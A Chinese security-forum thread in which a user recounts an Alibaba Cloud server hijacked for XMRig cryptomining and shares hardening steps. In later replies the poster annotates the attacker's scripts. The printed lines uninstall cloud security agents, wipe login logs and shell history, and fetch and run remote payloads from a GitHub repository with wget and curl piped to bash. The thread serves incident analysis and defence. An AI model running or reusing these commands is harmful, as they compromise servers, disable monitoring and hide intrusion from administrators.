吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 7589|回复: 45
收起左侧

[分享] 记阿里云主机再一次被黑客恶意脚本攻击

  [复制链接]
hoochanlon 发表于 2023-2-7 18:14
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!

记阿里云主机再一次被黑客恶意脚本攻击

登录阿里云控制台,查看安全告警信息,并联系客服咨询有关事件详情

接到手机上的短信,我及时联系了他们阿里云的客服,看了下控制台提供的黑客线索

注意到了 github.com/Tremblae/Tremble 的信息,主机重置快一个多来月了,这家伙又一次暴破了我的云主机...

这么高的CPU占用,我根据其进程及阿里云提供的线索,注意到了“xmrig”的进程。

下载其文件查看了json文件,已坐实黑客暴力破解及利用其他程序漏洞,攻入我的阿里云主机进行挖矿!

关于黑客仓库里的其他文件,我对阿里云客服也进行了咨询,据客服所述:"通常黑客会隐蔽自己的真实IP,用正则扫描检测公网云主机及开放端口;然后不断用数据字典暴力破解密码,或是其他后门绕开密码植入脚本,或其他二进制程序;这种脚本及程序,通常会卸载系统组件,乱改文件造成系统不稳定,并开放主机其他端口Ddos别人"。

清理病毒的参考资料

昨天才安装体验试用了下Clamav,没想到这次居然没起到其杀毒软件的作用啊...也不知道后来了解到的河马查杀效果怎样。经过这次事件后,我对Linux平台杀毒软件检测病毒的能力,也不是太乐观。

了解黑客攻击云主机的行为方式:

定时任务关闭及清除:

由于是免费领的阿里云主机,我基本上很少登录,所以没配置安装软件之类的,索性把root的定时任务全清除了。

后续策略

土豪或企业交给阿里云团队维护那另说,这里分享下我了解到的处理方式。

1. 修改用户登录策略

虽然他们文章是不错参考资料,但必须要注意Linux的版本号,版本不一样,命令也是大有改动。19年的centos8取消了pam_tally2模块,但网上不少文章是2022、2020,他们可能当时就是用的centos8以下。

以上总结是CentOS8对修改sshd文件的教训,只适合CentOS7及以下。还学到一招查看日志信息tail -f /var/log/messages

修改配置

vi /etc/pam.d/system-auth
# 顶行复制如下指令,即默认所有用户通用处理。
auth required  pam_faillock.so preauth silent audit deny=3  unlock_time=300 even_deny_root

解锁用户

# 解锁一个用户
faillock --user It --reset
# 解锁所有用户
faillock--reset

阿里给出的《Linux操作系统加固》文档,本质上就是用户登录策略...不过文档挺好、挺详细的。

2. 关闭不需要的远程端口及ICMP回显(ping)

关闭自己不用的桌面系统远程端口,如Windows:3389,SSH:22,改成其他的端口。

cp /etc/ssh/sshd_config /etc/ssh/sshd_config_bak/sshd_config && vi /etc/ssh/sshd_config
# 找到 # port 22位置,在下方添加 port 1122

但完全限死,只用VNC登录使用的话,太难受了...😂

3. 限制IP或更换IP

“0.0.0.0/0”,任何人都能访问,还是不太安全啊...百度关键字“IP”,临时用自己的公网IP登录,弄个弹性IP,换下IP也行吧...不过由于我个人在云主机没放什么重要东西,也没部署ftp、web等服务啥的,用的时候登录网页开启远程访问端口,这样也可以。

4. 若是自己存有重要资料及配置,那就自己做好每天的快照备份。

Linux不像微软的Windows那么服务到位,还有补丁推送,有不少杀软防护。基本上一切都得自己来。客服表示我想高枕无忧,啥也不想管,得找得加钱买服务,如:“web应用加固”、“企业支持计划”,全是一堆要钱的玩意。

可这些高昂费用,反正不适用于我这种个人用户。Linux恶意脚本通过其他程序服务上的机制漏洞,打开及利用这一程序后门,绕过密码注入脚本,搞破坏、静默上传下载、恶意ddos、挖矿等什么的,以及客服也对我给出了阿里云高危漏洞通报的访问入口:https://avd.aliyun.com/high-risk/list

总的来说,恶意脚本、软件不时重启打开,又会额外又生成多个脚本垃圾等;待到下次系统启动时,没查杀到的文件又会再自启运行生成其他文件,如此循环是挺难根除的。这样的话,还不如备份快照还原来得快。

免费评分

参与人数 14吾爱币 +16 热心值 +12 收起 理由
xiazhi426 + 1 我很赞同!
chenk0 + 1 我很赞同!
PeichenXie + 1 我很赞同!
STTR1 + 1 谢谢@Thanks!
onlyU22 + 1 + 1 我很赞同!
koubiqishi + 1 + 1 谢谢@Thanks!
xiaohanjss + 1 + 1 谢谢@Thanks!
Gunjo + 1 + 1 我很赞同!
吾恋兮不知 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
windpeaceflowe + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
Hmily + 7 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
woki + 1 我很赞同!
bingbingbd + 1 + 1 我很赞同!
O丶ne丨柒夜彡 + 1 + 1 热心回复!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| hoochanlon 发表于 2023-2-8 16:47

前言

病毒的压缩包及二进制文件,需要编译反编译工具,奈何本人学识有限,这部分论坛大佬帮忙脱壳专业解读下了。

由于各项源码较长,所以我分成几个帖子几个部分来一一解读脚本。在做总结前,我已将此类问题进行举报,并反馈到阿里云客服。接下来是本人有限水平对黑客恶意代码的分析,尽量解读出这家伙在我云主机上究竟做了什么。

xz.sh部分,即卸载脚本

参考信息源:

黑客核心动作代码解读,为了写作方便,解读说明在注释里。

# 首先是下载阿里云盾卸载脚本
wget http://update.aegis.aliyun.com/download/uninstall.sh
chmod +x uninstall.sh && ./uninstall.sh
# 然后屏蔽掉云盾IP
iptables -I INPUT -s 140.205.201.0/28 -j DROP
# 进行恶意卸载云盾等其他组件服务
sh /usr/local/qcloud/stargate/admin/uninstall.sh
# 还把监控都给停止了
service telescoped stop
# 清除系统登录成功命令历史记录
echo > /var/log/wtmp 
# 清除登陆系统失败的记录
echo > /var/log/btmp
# 导入空记录,清除历史执行命令
echo > .bash_history
# 清除历史执行命令并保存。
history -c && history -w
# 删掉脚本
rm -rf cd /root/uninstall.sh

总结:下载卸载脚本,屏蔽IP逃过检查,执行脚本,删除记录。

免费评分

参与人数 1吾爱币 +2 热心值 +1 收起 理由
枫恋蓝点 + 2 + 1 用心讨论,共获提升!

查看全部评分

zhichengishero 发表于 2023-2-8 12:30
省流:个人免费阿里云服务器阿里不负责管理维护需个人自身。(手动狗头)
 楼主| hoochanlon 发表于 2023-2-8 12:53
本帖最后由 hoochanlon 于 2023-2-8 13:05 编辑
zhichengishero 发表于 2023-2-8 12:30
省流:个人免费阿里云服务器阿里不负责管理维护需个人自身。(手动狗头)

这总结可以,支持。

不过我得花时间看看黑客这开源的挖矿病毒到底搞什么鬼。看起来这只是针对Linux的,同样的类unix的Mac上,目前没发现什么异常。查了下资料,Mac有个叫沙盒机制策略。保险起见,我也要准备还原Mac了,毕竟得考虑中病毒的风险。
leeshameless 发表于 2023-2-8 17:36
挺有意思的,但不会黑客这一套。
 楼主| hoochanlon 发表于 2023-2-8 19:08
本帖最后由 hoochanlon 于 2023-2-8 19:11 编辑

k.sh部分,字意推测为杀死进程脚本

黑客核心动作逻辑代码解读

# 结束dos26(可能为ddos)
killall -9 dos26
# 结束不明程序(命名不知其意)
killall -9 tfq
# 结束挖矿程序
killall -9 xmrig
# 删除程序
rm -rf cd /tmp/dos26
rm -rf cd /tmp/tfq
rm -rf cd /tmp/xmrig
# 判断对象是否有可写(Write)权限,是则为真
if [ ! -w "/tmp/dos64" ]; then
# 进入目录,下载恶意dos,赋予读写及执行权限,并执行
    cd /tmp;wget https://ghproxy.com/https://raw.githubusercontent.com/Tremblae/Tremble/main/dos64;chmod 777 dos64;./dos64
fi
if [ ! -w "/root/c3pool/xmrig" ]; then
# 下载恶意靶机脚本执行
    curl -s -L https://ghproxy.com/https://raw.githubusercontent.com/Tremblae/Tremble/main/ba.sh | bash -s
fi
# 又一次删除程序
rm -rf cd /tmp/dos26
rm -rf cd /tmp/tfq
rm -rf cd /tmp/xmrig
# 休眠,删掉挖矿记录文件
sleep 88;rm -rf cd /root/c3pool

参考信息源:

另外在【 病毒样本区】,也找到了此类挖矿病毒。linux服务器再度发现执行病毒(出处: 吾爱破解论坛)

riwfhiu 发表于 2023-2-8 19:35
xmrig这个挖矿进程我也中过,而且只有在腾讯云或者阿里云中过,后面我业务转到托管物理机器了,也没中过了,因为系统都是重装过的原版,而且ssh之类的端口我也修改过,从来没中过一次异常病毒。而腾讯云的小机器里倒是中过几次,而且重装系统修改端口密码也不行,有时候还是会中,我猜测应该是跟系统漏洞有关,腾讯阿里的系统不是原版linux,估计是定制过的,有特征漏洞之类的,被黑客研究过一台之后,其它相同系统的估计也难逃其黑手。
丶懒喵喵 发表于 2023-2-8 19:45
免费的不靠谱,之前领了腾讯的一个月免费。也是给我推挖矿病毒。花钱买的却没有
 楼主| hoochanlon 发表于 2023-2-8 19:48
riwfhiu 发表于 2023-2-8 19:35
xmrig这个挖矿进程我也中过,而且只有在腾讯云或者阿里云中过,后面我业务转到托管物理机器了,也没中过了 ...

感谢提供这方面的线索和见解
gpr960910 发表于 2023-2-8 20:34
这可以理解,毕竟已经是白嫖的。。。。。。。
不过感谢楼主分享经验,回去做个应急。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-28 07:40

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表